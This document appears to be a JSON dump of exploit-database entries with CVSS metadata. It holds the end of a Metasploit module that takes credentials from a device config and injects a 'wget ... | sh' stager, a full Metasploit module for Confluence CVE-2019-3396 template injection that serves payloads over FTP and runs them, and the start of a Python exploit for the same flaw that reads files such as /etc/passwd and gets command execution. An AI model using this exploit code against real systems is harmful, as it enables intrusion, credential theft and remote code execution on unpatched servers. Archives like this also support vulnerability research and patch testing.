Aborting.')\r\n return nil\r\n end\r\n\r\n print_status(\"Successfully downloaded config\")\r\n username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]\r\n pass = res.body.match(/^PASSWD=(\\h+)/)[1]\r\n authkey = \"1964300002\"\r\n print_status(\"Got MD5-Hash: #{pass}\")\r\n print_status(\"Loging in as user #{username} using password hash.\")\r\n print_status(\"Using default auth_key #{authkey}\")\r\n res2 = send_request_cgi({\r\n 'uri' => normalize_uri(\"cgi-bin\",\"userLogin.cgi\"),\r\n 'SSL' => datastore['USE_SSL'],\r\n 'method' => 'POST',\r\n 'data' => \"login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch¤t_password=&new_password=&re_new_password=\"\r\n })\r\n\r\n unless res\r\n vprint_error('Connection failed during login. Aborting.')\r\n return nil\r\n end\r\n\r\n unless res.code == 200\r\n vprint_error('Login failed with downloaded credentials. Aborting.')\r\n return nil\r\n end\r\n\r\n #Extract authentication cookies\r\n cookies = res2.get_cookies()\r\n print_status(\"Successfully logged in as user #{username}.\")\r\n print_status(\"Got cookies: #{cookies}\")\r\n print_status(\"Sending payload. Staging via #{payload_url}.\")\r\n #Build staging command\r\n command_string = CGI::escape(\"'$(wget -q -O- #{payload_url}|sh)'\")\r\n if(command_string.length <= 63)\r\n print_status(\"Staging command length looks good. Sending exploit!\")\r\n else\r\n vprint_error(\"Warning: Staging command length probably too long. 
Trying anyway...\")\r\n end\r\n\r\n res3 = send_request_cgi({\r\n 'uri' => normalize_uri(\"certificate_handle2.htm\"),\r\n 'SSL' => datastore['USE_SSL'],\r\n 'method' => 'POST',\r\n 'cookie' => cookies,\r\n 'vars_get' => {\r\n 'type' => '4',\r\n },\r\n 'vars_post' => {\r\n 'page' => 'self_generator.htm',\r\n 'totalRules' => '1',\r\n 'OpenVPNRules' => '30',\r\n 'submitStatus' => '1',\r\n 'log_ch' => '1',\r\n 'type' => '4',\r\n 'Country' => 'A',\r\n 'state' => 'A',\r\n 'locality' => 'A',\r\n 'organization' => 'A',\r\n 'organization_unit' => 'A',\r\n 'email' => 'any@example.com',\r\n 'KeySize' => '512',\r\n 'KeyLength' => '1024',\r\n 'valid_days' => '30',\r\n 'SelectSubject_c' => '1',\r\n 'SelectSubject_s' => '1'\r\n },\r\n 'data' => \"common_name=#{command_string}\"\r\n })\r\n unless res3\r\n vprint_error('Connection failed while sending command. Aborting.')\r\n return nil\r\n end\r\n\r\n unless res3.code == 200\r\n vprint_error('Sending command not successful.')\r\n return nil\r\n end\r\n print_status(\"Sending payload timed out. Waiting for stager to connect...\")\r\n end\r\n\r\n def check\r\n #Check if device is vulnerable by downloading the config\r\n res = send_request_cgi({'uri'=>normalize_uri(\"cgi-bin\",\"config.exp\")})\r\n\r\n unless res\r\n vprint_error('Connection failed.')\r\n return CheckCode::Unknown\r\n end\r\n\r\n unless res.code == 200\r\n return CheckCode::Safe\r\n end\r\n\r\n unless res.body =~ /PASSWD/\r\n return CheckCode::Detected\r\n end\r\n\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n # Main function.\r\n # Setting delay for the Stager.\r\n Timeout.timeout(datastore['HTTPDELAY']) {super}\r\n rescue Timeout::Error\r\n print_status(\"Waiting for stager connection timed out. 
Try increasing the delay.\")\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/46655", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T06:10:35", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-19T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-3396", "CVE-2019-3396"], "modified": "2019-04-19T00:00:00", "id": "EDB-ID:46731", "href": "https://www.exploit-db.com/exploits/46731", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::FtpServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Atlassian Confluence Widget 
Connector Macro Velocity Template Injection\",\r\n 'Description' => %q{\r\n Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\r\n allows embed online videos, slideshows, photostreams and more directly into page.\r\n A _template parameter can be used to inject remote Java code into a Velocity template,\r\n and gain code execution. Authentication is unrequired to exploit this vulnerability.\r\n By default, Java payload will be used because it is cross-platform, but you can also\r\n specify which native payload you want (Linux or Windows).\r\n\r\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\r\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\r\n\r\n This vulnerability was originally discovered by Daniil Dmitriev\r\n https://twitter.com/ddv_ua.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Daniil Dmitriev', # Discovering vulnerability\r\n 'Dmitry (rrock) Shchannikov' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-3396' ],\r\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\r\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\r\n [ 'URL', 'https://paper.seebug.org/886/']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\r\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\r\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8090,\r\n 'SRVPORT' => 8021,\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Mar 25 2019',\r\n 'DefaultTarget' => 0,\r\n 'Stance' => Msf::Exploit::Stance::Aggressive\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),\r\n OptString.new('TRIGGERURL', [true, 'Url to external video 
service to trigger vulnerability',\r\n 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])\r\n ])\r\n end\r\n\r\n # Handles ftp RETP command.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] RETR argument.\r\n # @return [void]\r\n def on_client_command_retr(c, arg)\r\n vprint_status(\"FTP download request for #{arg}\")\r\n conn = establish_data_connection(c)\r\n if(not conn)\r\n c.put(\"425 Can't build data connection\\r\\n\")\r\n return\r\n end\r\n\r\n c.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\r\n case arg\r\n when /check\\.vm$/\r\n conn.put(wrap(get_check_vm))\r\n when /javaprop\\.vm$/\r\n conn.put(wrap(get_javaprop_vm))\r\n when /upload\\.vm$/\r\n conn.put(wrap(get_upload_vm))\r\n when /exec\\.vm$/\r\n conn.put(wrap(get_exec_vm))\r\n else\r\n conn.put(wrap(get_dummy_vm))\r\n end\r\n c.put(\"226 Transfer complete.\\r\\n\")\r\n conn.close\r\n end\r\n\r\n # Handles ftp PASS command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] PASS argument.\r\n # @return [void]\r\n def on_client_command_pass(c, arg)\r\n @state[c][:pass] = arg\r\n vprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\")\r\n c.put \"230 Login OK\\r\\n\"\r\n end\r\n\r\n # Handles ftp EPSV command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] EPSV argument.\r\n # @return [void]\r\n def on_client_command_epsv(c, arg)\r\n vprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\")\r\n c.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\r\n end\r\n\r\n # Returns a upload template.\r\n #\r\n # @return [String]\r\n def get_upload_vm\r\n (\r\n <<~EOF\r\n 
$i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\r\n EOF\r\n )\r\n end\r\n\r\n # Returns a command execution template.\r\n #\r\n # @return [String]\r\n def get_exec_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns checking template.\r\n #\r\n # @return [String]\r\n def get_check_vm\r\n (\r\n <<~EOF\r\n #{@check_text}\r\n EOF\r\n )\r\n end\r\n\r\n # Returns Java's getting property template.\r\n #\r\n # @return [String]\r\n def get_javaprop_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns dummy template.\r\n #\r\n # @return [String]\r\n def get_dummy_vm\r\n (\r\n <<~EOF\r\n EOF\r\n )\r\n end\r\n\r\n # Checks the vulnerability.\r\n #\r\n # @return [Array] Check code\r\n def check\r\n checkcode = Exploit::CheckCode::Safe\r\n begin\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n @check_text = Rex::Text.rand_text_alpha(5..10)\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\r\n if res && res.body && res.body.include?(@check_text)\r\n checkcode = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n checkcode = Exploit::CheckCode::Unknown\r\n end\r\n checkcode\r\n end\r\n\r\n # Injects Java code to the template.\r\n #\r\n # @param service_url [String] Address of template to injection.\r\n # @return [void]\r\n def inject_template(service_url, timeout=20)\r\n\r\n uri = 
normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'headers' => {\r\n 'Accept' => '*/*',\r\n 'Origin' => full_uri(vhost_uri: true)\r\n },\r\n 'ctype' => 'application/json; charset=UTF-8',\r\n 'data' => {\r\n 'contentId' => '1',\r\n 'macro' => {\r\n 'name' => 'widget',\r\n 'body' => '',\r\n 'params' => {\r\n 'url' => datastore['TRIGGERURL'],\r\n '_template' => service_url\r\n }\r\n\r\n }\r\n }.to_json\r\n }, timeout=timeout)\r\n\r\n unless res\r\n unless service_url.include?(\"exec.vm\")\r\n print_warning('Connection timed out in #inject_template')\r\n end\r\n return\r\n end\r\n\r\n if res.body.include? 'widget-error'\r\n print_error('Failed to inject and execute code:')\r\n else\r\n vprint_status(\"Server response:\")\r\n end\r\n\r\n vprint_line(res.body)\r\n\r\n res\r\n end\r\n\r\n # Returns a system property for Java.\r\n #\r\n # @param prop [String] Name of the property to retrieve.\r\n # @return [String]\r\n def get_java_property(prop)\r\n @prop = prop\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\r\n if res && res.body\r\n return clear_response(res.body)\r\n end\r\n ''\r\n end\r\n\r\n # Returns the target platform.\r\n #\r\n # @return [String]\r\n def get_target_platform\r\n return get_java_property('os.name')\r\n end\r\n\r\n # Checks if the target os/platform is compatible with the module target or not.\r\n #\r\n # @return [TrueClass] Compatible\r\n # @return [FalseClass] Not compatible\r\n def target_platform_compat?(target_platform)\r\n target.platform.names.each do |n|\r\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\r\n return true\r\n end\r\n end\r\n\r\n false\r\n end\r\n\r\n # Returns a temp path from the remote target.\r\n #\r\n # @return [String]\r\n def get_tmp_path\r\n return get_java_property('java.io.tmpdir')\r\n end\r\n\r\n # Returns the 
Java home path used by Confluence.\r\n #\r\n # @return [String]\r\n def get_java_home_path\r\n return get_java_property('java.home')\r\n end\r\n\r\n # Returns Java code that can be used to inject to the template in order to copy a file.\r\n #\r\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\r\n # It is meant to be used with #get_write_file_code.\r\n #\r\n # @param fname [String] The file to copy\r\n # @param new_fname [String] The new file\r\n # @return [void]\r\n def get_dup_file_code(fname, new_fname)\r\n if fname =~ /^\\/[[:print:]]+/\r\n @command = \"cp #{fname} #{new_fname}\"\r\n else\r\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\r\n end\r\n\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n end\r\n\r\n # Returns the normalized file path for payload.\r\n #\r\n # @return [String]\r\n def normalize_payload_fname(tmp_path, fname)\r\n # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.\r\n if /^\\/[[:print:]]+/ === tmp_path\r\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\r\n else\r\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\r\n end\r\n end\r\n\r\n # Exploits the target in Java platform.\r\n #\r\n # @return [void]\r\n def exploit_as_java\r\n\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\r\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\r\n @command = ''\r\n\r\n java_home = get_java_home_path\r\n\r\n if java_home.blank?\r\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\r\n else\r\n vprint_status(\"Found Java home path: #{java_home}\")\r\n end\r\n\r\n register_files_for_cleanup(@fname)\r\n\r\n if /^\\/[[:print:]]+/ === @fname\r\n normalized_java_path = 
Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\r\n @command = %Q|#{normalized_java_path} -jar #{@fname}|\r\n else\r\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n @command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}|\r\n end\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to execute #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target in Windows platform.\r\n #\r\n # @return [void]\r\n def exploit_as_windows\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target in Linux platform.\r\n #\r\n # @return 
[void]\r\n def exploit_as_linux\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\r\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n @command = \"chmod +x #{@fname}\"\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n def exploit\r\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\r\n\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n target_platform = get_target_platform\r\n if target_platform.nil?\r\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. 
Confirm RHOSTS and RPORT, then run \"check\".')\r\n else\r\n print_status(\"Target being detected as: #{target_platform}\")\r\n end\r\n\r\n unless target_platform_compat?(target_platform)\r\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\r\n end\r\n\r\n case target.name.downcase\r\n when /java$/\r\n exploit_as_java\r\n when /windows$/\r\n exploit_as_windows\r\n when /linux$/\r\n exploit_as_linux\r\n end\r\n end\r\n\r\n # Wraps request.\r\n #\r\n # @return [String]\r\n def wrap(string)\r\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\r\n end\r\n\r\n # Returns unwrapped response.\r\n #\r\n # @return [String]\r\n def clear_response(string)\r\n if match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)\r\n return match.captures[0]\r\n end\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/46731", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T06:05:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence Widget Connector Macro - SSTI", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-3396", "CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "EDB-ID:49465", "href": "https://www.exploit-db.com/exploits/49465", "sourceData": "# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \r\n# Date: 21-Jan-2021\r\n# Exploit Author: 46o60\r\n# Vendor Homepage: https://www.atlassian.com/software/confluence\r\n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin\r\n# Version: 6.12.1\r\n# Tested on: Ubuntu 20.04.1 LTS\r\n# CVE : CVE-2019-3396\r\n\r\n#!/usr/bin/env python3\r\n# -*- coding: UTF-8 -*-\r\n\"\"\"\r\n\r\nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian\r\nConfluence Server server-side template injection.\r\n\r\nVulnerability information:\r\n Authors:\r\n Daniil Dmitriev - Discovering vulnerability\r\n Dmitry (rrock) Shchannikov - Metasploit module\r\n Exploit\r\n ExploitDB:\r\n https://www.exploit-db.com/exploits/46731\r\n Metasploit\r\n https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/\r\n exploit/multi/http/confluence_widget_connector\r\n\r\nWhile Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made\r\nfrom the target Confluence server towards attacker's server where the Velocity template with the payload is being\r\nhosted. If this is not possible, for example, because network where the target Confluence server is located filters all\r\noutbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this\r\nalternative approach by first uploading the template to the server and then loading it with original vulnerability from\r\nlocal file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. 
Any\r\nuser can upload a file to the server by attaching the file to his \"personal space\".\r\n\r\nThere are two modes of the exploit:\r\n 1. Exploiting path traversal for file disclosure and directory listings.\r\n 2. RCE by uploading a template file with payload to the server.\r\n\r\nIn case where network is filtered and loading remote template is not possible and also you do not have a low-privileged\r\nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode\r\nof this exploit. Conveniently, application returns file content as well as directory listing depending on to what path\r\nis pointing to. As in original exploit no authentication is needed for this mode.\r\n\r\nLimitations of path traversal exploit:\r\n- not possible to distinguish between non-existent path and lack of permissions\r\n- no distinction between files and directories in the output\r\n\r\nIf you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A\r\nregular user probably has enough privileges for this since each user can have their own personal space where they\r\nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not\r\nexists, a file with Velocity template payload. 
It then uses the original vulnerability but loads the template file\r\nwith payload from local filesystem instead from remote system.\r\n\r\nPrerequisite of RCE in this exploit:\r\n- authenticated session is needed\r\n- knowledge of where attached files are stored on the file system - if it is not default location then use first mode\r\nto find it, should be in Confluence install directory under ./attachments subdirectory\r\n\r\nUsage\r\n- list /etc folder on Confluence server hosted on http://confluence.example.com\r\n python exploit.py -th confluence.example.com fs /etc\r\n- get content of /etc/passwd on same server but through a proxy\r\n python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd\r\n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using\r\nexisting session)\r\n python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\"\r\n\r\nTested on Confluence versions:\r\n 6.12.1\r\n\r\nTo test the exploit:\r\n 1. Download Confluence trial version for version 6.12.1\r\n https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin\r\n (to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser\r\n network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and\r\n change the version in URL to be 6.12.1)\r\n SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin\r\n 2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default.\r\n chmod +x atlassian-confluence-6.12.1-x64.bin\r\n sudo ./atlassian-confluence-6.12.1-x64.bin\r\n 3. Open the browser to configure initial installation, when you get to license window copy the server ID.\r\n 4. 
Create account at https://my.atlassian.com/ and request for new trial license using server ID.\r\n 5. Activate the license and finish the installation with default options.\r\n 6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the\r\n exploit.\r\n 7. Run the exploit (see usage above).\r\n\"\"\"\r\n\r\n__version__ = \"1.0.0\"\r\n__author__ = \"46o60\"\r\n\r\nimport argparse\r\nimport logging\r\nimport requests\r\nimport urllib3\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport json\r\nimport random\r\nimport string\r\n\r\n# script and banner\r\nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\"\r\nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \r\n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \r\n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \r\n \r\n\"\"\"\r\n\r\n# turn off requests log output\r\nurllib3.disable_warnings()\r\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\r\n\r\n\r\ndef print_banner():\r\n \"\"\"\r\n Prints script ASCII banner and basic information.\r\n\r\n Because it is cool.\r\n \"\"\"\r\n print(ASCII_BANNER_TEXT)\r\n print(\"{} v{}\".format(SCRIPT_NAME, __version__))\r\n print(\"Author: {}\".format(__author__))\r\n print()\r\n\r\n\r\ndef exit_log(logger, message):\r\n \"\"\"\r\n Utility function to log exit message and finish the script.\r\n \"\"\"\r\n logger.error(message)\r\n exit(1)\r\n\r\n\r\ndef check_cookie_format(value):\r\n \"\"\"\r\n Checks if value is in format: ^[^=]+=[^=]+$\r\n \"\"\"\r\n pattern = r\"^[^=]+=[^=]+$\"\r\n if not re.match(pattern, value):\r\n raise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\")\r\n return value\r\n\r\n\r\ndef parse_arguments():\r\n \"\"\"\r\n Performs parsing of script arguments.\r\n \"\"\"\r\n # creating parser\r\n parser = argparse.ArgumentParser(\r\n prog=SCRIPT_NAME,\r\n description=\"Exploit CVE-2019-3396 to explore file system or gain RCE 
through file upload.\"\r\n )\r\n\r\n # general script arguments\r\n parser.add_argument(\r\n \"-V\", \"--version\",\r\n help=\"displays the current version of the script\",\r\n action=\"version\",\r\n version=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__)\r\n )\r\n parser.add_argument(\r\n \"-v\", \"--verbosity\",\r\n help=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\",\r\n action=\"count\",\r\n default=0\r\n )\r\n parser.add_argument(\r\n \"-sb\", \"--skip-banner\",\r\n help=\"skips printing of the banner\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n parser.add_argument(\r\n \"-s\", \"--silent\",\r\n help=\"do not output results of the exploit to standard output\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n parser.add_argument(\r\n \"-q\", \"--quiet\",\r\n help=\"do not output any logs\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n\r\n # arguments for input\r\n parser.add_argument(\r\n \"-px\", \"--proxy\",\r\n help=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\"\r\n )\r\n parser.add_argument(\r\n \"-t\", \"--tls\",\r\n help=\"use HTTPS protocol, default behaviour is to use plain HTTP\",\r\n action=\"store_true\"\r\n )\r\n parser.add_argument(\r\n \"-th\", \"--target-host\",\r\n help=\"target hostname/domain\",\r\n required=True\r\n )\r\n parser.add_argument(\r\n \"-p\", \"--port\",\r\n help=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\"\r\n )\r\n\r\n # two different sub commands\r\n subparsers = parser.add_subparsers(\r\n title=\"actions\",\r\n description=\"different behaviours of the script\",\r\n help=\"for detail description of available action options invoke -h for each individual action\",\r\n dest=\"action\"\r\n )\r\n\r\n # only exploring file system by disclosure of files and directories\r\n parser_file_system = subparsers.add_parser(\r\n \"fs\",\r\n 
